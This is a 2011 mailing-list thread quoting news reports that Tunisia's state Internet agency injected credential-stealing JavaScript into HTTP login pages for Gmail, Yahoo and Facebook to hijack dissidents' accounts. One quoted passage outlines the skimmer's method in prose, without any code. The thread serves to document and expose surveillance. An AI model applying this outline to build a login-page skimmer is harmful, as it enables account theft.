[liberationtech] Tunisian government hacks into gmail and Facebook accounts

Thu Jan 13 13:51:11 PST 2011

>From what I'm seeing, the filters have been turned off entirely; even
Nawaat, which was allegedly blocked by keyword, is currently unfiltered
(Sami Ben Gharbia's piece on Tunisia's multilayered filtering system:
http://nawaat.org/portail/2010/08/19/a-first-glimpse-at-the-internet-filtering-in-tunisia/
).

-Jillian

On Thu, Jan 13, 2011 at 4:48 PM, Wagner, Ben <Ben.Wagner at eui.eu> wrote:

> Having hacked Gmail and Facebook accounts, the Tunisian government now
> claims that it wants to stop internet censorship entirely:
>
> "President Zine El Abidine Ben Ali, in a televised speech Thursday night,
> also pledged to end Internet censorship and to open up the political playing
> field in a country where he has allowed little public criticism for the past
> 23 years."
>
> Source:
> http://articles.moneycentral.msn.com/news/article.aspx?feed=AP&date=20110113&id=12601387
>
> At least some sites seem to have been unblocked including Youtube and the
> OpenNet initiative. Whether this is a permanent change or not remains to be
> seen. The general strike which is supposed to be taking place tomorrow may
> also have a significant impact on many of the 'promises' made made by Ben
> Ali this evening.
>
>
> http://advocacy.globalvoicesonline.org/2011/01/13/is-tunisian-internet-censorship-shutting-down/
>
> Best,
> Ben
>
>
> On 13 Jan 2011, at 01:33, Terry Winograd wrote:
>
> >
> http://www.fastcompany.com/1715575/tunisian-government-hacking-facebook-gmail-anonymous
> >
> > Tunisian Government Allegedly Hacking Facebook, Gmail Accounts of
> > Dissidents and Journalists
> > BY Neal UngerleiderMon Jan 10, 2011
> >
> >> A strange bit of JavaScript has found its way onto Tunisian Internet
> users' internet login screens. Some are now in jail in a country known for
> torture. But they've been adopted by an unlikely ally: Anonymous.
> >
> > Massive riots and protests have rocked Tunisia this past month. After
> > a 26-year-old street vendor named Mohammed Bouazizi attempted to kill
> > himself by self-immolation (he survived and later died of his burns),
> > hundreds of thousands took to the North African nation's streets. The
> > protesters complain of unemployment, economic woes, and an omnipresent
> > dictatorship. Tunisia's government has stumbled upon a new method of
> > combating the protesters: hacking into their social media accounts.
> >
> > According to a report by the Committee to Protect Journalists, the
> > Tunisian government appears to be breaking into the Facebook, Google,
> > and Yahoo accounts of dissidents and journalists. Hackers with unusual
> > levels of access to Tunisia's state-control network infrastructure
> > have managed to gain access to Facebook accounts belonging to
> > individuals such as journalists Sofiene Chourabi of al-Tariq al-Jadid
> > (New Path; a newspaper affiliated with the opposition Movement
> > Ettajdid party) and independent video journalist Haythem El Mekki,
> > while gaining the passwords of others. Hack targets found that
> > Facebook groups they founded were deleted, as were pictures of
> > protests. In CPJ's words, "Their accounts and pictures of recent
> > protests have been deleted or otherwise compromised.” Blogs hosted on
> > Blogspot and elsewhere are also being targeted. Here is an excerpt
> > from a post by Lina Ben Mhenni of the A Tunisian Girl blog:
> >
> >> Well, I can understand ... No I can't understand that some stupid person
> has hacked my e-mail then, my Facebook account. This stupid person has also
> deleted some pages in which I am an administrator. Pages like that of
> 7ellblog (launch a blog) which has been largely promoted even by official
> media, the page of the Tunisian singer Amel Mathlouthi, Reading Books is
> Better than Staring at others (yes they hate reading and culture uin my
> country), the Tunisian blogosphere, and may be a page against censorship '
> la censure nuit à l 'image de mon pays' (I don't have the confirmation yet)
> and many other pages were deleted. What happened is so shameful because the
> internet police is again confirming its stupidity and useless stubbornness.
> Sofiene Chourabi and Azyz Amami are experiencing the same problem now. They
> have been hacked.
> >
> > Already, in-depth information is surfacing on how the hacks were
> > committed. It appears that the Agence tunisienne d'Internet, a
> > government agency which supervises all of Tunisia's ISPs, or someone
> > with access to the agency committed them. Tunisian ISPs are running a
> > Java script that siphons off login credentials from users of Facebook,
> > Yahoo and Gmail. According to the Tech Herald's Steve Ragan:
> >
> >> Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
> Josh Abraham, broke the code down further. Crowley explained that the
> JavaScript is customized for each site’s login form. It will pull the
> username and password, and encode it with a weak crypto algorithm. The newly
> encrypted data is placed into the URL, and a randomly generated five
> character key is added. The randomly generated key is meaningless, but it is
> assumed that it’s there to add a false sense of legitimacy to the URL. The
> random characters and encrypted user information are delivered in the form
> of a GET request to a non working URL.
> >
> > The code only targeted users accessing HTTP sites instead of HTTPS,
> > which appears to be why Facebook was so heavily ravaged by the hack
> > plan. Facebook users default to using HTTP to access the site.
> >
> > Much of this information has been released to the public by the
> > quasi-4Chan allied Anonymous group, which has launched an
> > anti-Tunisian government hacker campaign called Operation: Tunisia.
> >
> > Amamou was taken into police custody this past week after authorities
> > apparently found his location via Foursquare. His current whereabouts
> > are unknown.
> >
> > The Agence tunisienne d'Internet has long been one of the most
> > censorship-happy government agencies in all of Africa. Tunisia's net
> > firewalls and intricate IP tracking mechanisms have been compared to
> > China's, while popular sites like YouTube and DailyMotion were banned
> > due to hosting videos alleging human rights abuses in Tunisian
> > prisons. In one of the WikiLeaks cables on Tunisia, an anonymous
> > diplomat notes endemic government corruption and refers to the
> > government of President-for-life Zine al-Abidine Ben Ali as a
> > “quasi-mafia” and a police state.”
> >
> > While Facebook, Google and Yahoo have not spoken publicly on the
> > alleged Tunisian government hacking campaign yet, the State Department
> > has. In a press conference on Friday, January 7, spokesperson Philip
> > Crowley stated:
> >
> >> We are concerned about recent reports that Tunisian ISP providers, at
> the direction of the government, hacked into the accounts of Tunisian users
> of American companies including Facebook, and providers of email such as
> Yahoo and Google, and stealing passwords. This kind of interference
> threatens the ability of civil society to realize the benefits of new
> technologies. Cyber intrusions of all kinds, including reported attacks on
> government of Tunisia websites, disrupt the free flow of information and
> reduce overall confidence in the reliability and security of vital
> information networks.
> >
> > During the past week, in addition to Amamou, at least three other
> > members of Tunisia's hacker and blogger communities were taken into
> > custody by Tunisian police.
> >
> >
> > ----------------------------------
> >
> >
> http://www.thetechherald.com/article.php/201101/6651/Tunisian-government-harvesting-usernames-and-passwords
> >
> > Tunisian government harvesting usernames and passwords
> > by Steve Ragan - Jan 4 2011, 20:08
> >
> >
> > The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is
> > being blamed for the presence of injected JavaScript that captures
> > usernames and passwords. The code has been discovered on login pages
> > for Gmail, Yahoo, and Facebook, and said to be the reason for the
> > recent rash of account hijackings reported by Tunisian protesters.
> >
> > ATI is run by the Tunisian Ministry of Communications. They supply all
> > of the privately held Tunisian ISPs, making them the main source of
> > Internet access in the country. They’ve been under scrutiny for years,
> > due to the fact that they make use of their authority to regulate the
> > entire national network. Last April, ATI earned international
> > attention by blocking access to sites such as Flickr, YouTube, and
> > Vimeo.
> >
> > According to Reporters Without Borders, authorities claim to target
> > only pornographic or terrorist websites. “However, censorship applies
> > above all to political opposition, independent news, and human rights
> > websites.”
> >
> > “When an Internet user attempts to access a prohibited website, the
> > following automatic error message appears: “Error 404: page not
> > found,” without displaying the familiar “Error 403” more typical of a
> > blocked site...This strategy equates to a disguised form of
> > censorship.”
> >
> > As for the JavaScript itself, The Tech Herald has seen examples of the
> > embedded script during live surfing sessions with sources in Tunisia,
> > and in posted source code made available to the Web. The source for
> > the GMail injection is here, the Yahoo injection is here, and Facebook
> > is here.
> >
> > Four different experts consulted by The Tech Herald independently
> > confirmed our thoughts; the embedded code is siphoning off login
> > credentials.
> >
> > On Twitter, security researcher Gerry Kavanagh and Errata Security CTO
> > David Maynor told us that you can tell the code is capturing login
> > information by how it references the login element for the form.
> >
> > “Suffice to say, the code is definitely doing something
> > surreptitious,” Kavanagh noted.
> >
> > Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
> > Josh Abraham, broke the code down further. Crowley explained that the
> > JavaScript is customized for each site’s login form. It will pull the
> > username and password, and encode it with a weak crypto algorithm.
> >
> > The newly encrypted data is placed into the URL, and a randomly
> > generated five character key is added. The randomly generated key is
> > meaningless, but it is assumed that it’s there to add a false sense of
> > legitimacy to the URL.
> >
> > The random characters and encrypted user information are delivered in
> > the form of a GET request to a non working URL. In the Gmail example,
> > you see this URL listed as http://www.google.com/wo0dh3ad. Abraham
> > noted that the encryption makes it easy to capture usernames and
> > passwords that would include special characters such as ‘%’ or ‘/’.
> >
> > Considering that the backbone of the Tunisian Internet is full of
> > state run filters and firewalls designed to block access, configuring
> > one to log the GET commands with the harvested data would be trivial.
> > But is this a government sponsored action?
> >
> > The likelihood that a group of criminals compromised the entire
> > Tunisian infrastructure is virtually nonexistent. Code planting on
> > this scale could only originate form an ISP. With their history of
> > holding an iron grip on the Internet, ATI is the logical source of the
> > information harvesting.
> >
> > There is an upside however, as the embedded JavaScript only appears
> > when one of the sites is accessed with HTTP instead of HTTPS. In each
> > test case, we were able to confirm that Gmail and Yahoo were only
> > compromised when HTTP was used. For Facebook on the other hand, the
> > default is access is HTTP, so users in Tunisia will need to visit the
> > HTTPS address manually.
> >
> > Another interesting note is that it appears the embedded code has
> > targeted Tunisian users for several months. Slim Amamou, of the Global
> > Voices Advocacy blog, reported his findings on the code last July, and
> > at the time, ATI was blocking Google’s HTTPS port, forcing users to
> > default to HTTP.
> >
> > The information surrounding the embedded JavaScript came to our
> > attention thanks to a user on the IRC server where supporters for
> > Anonymous’ Operation: Tunisia gathered to show support for Tunisian
> > protesters. When word spread of embedded code and account hijackings,
> > Anonymous offered Tunisian users help via Userscripts.org, with a
> > browser add-on that strips the added JavaScript code.
> >
> > The ATI website has been offline for more than a day. The outage
> > started after Anonymous launched Operation: Tunisia. Our coverage on
> > their actions and the problems in Tunisia is here.
> >
> > --
> > _______________________________________________
> > liberationtech mailing list
> > liberationtech at lists.stanford.edu
> >
> > Should you need to change your subscription options, please go to:
> >
> > https://mailman.stanford.edu/mailman/listinfo/liberationtech
> >
> > If you would like to receive a daily digest, click "yes" (once you click
> above) next to "would you like to receive list mail batched in a daily
> digest?"
> >
> > You will need the user name and password you receive from the list
> moderator in monthly reminders.
> >
> > Should you need immediate assistance, please contact the list moderator.
> >
>
>
> _______________________________________________
> liberationtech mailing list
> liberationtech at lists.stanford.edu
>
> Should you need to change your subscription options, please go to:
>
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>
> If you would like to receive a daily digest, click "yes" (once you click
> above) next to "would you like to receive list mail batched in a daily
> digest?"
>
> You will need the user name and password you receive from the list
> moderator in monthly reminders.
>
> Should you need immediate assistance, please contact the list moderator.
>

-- 
Berkman Center for Internet and Society |
https://cyber.law.harvard.edu/people/jyork
jilliancyork.com | @jilliancyork | tel: +1-857-891-4244
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.stanford.edu/pipermail/liberationtech/attachments/20110113/a9cb0f00/attachment.html>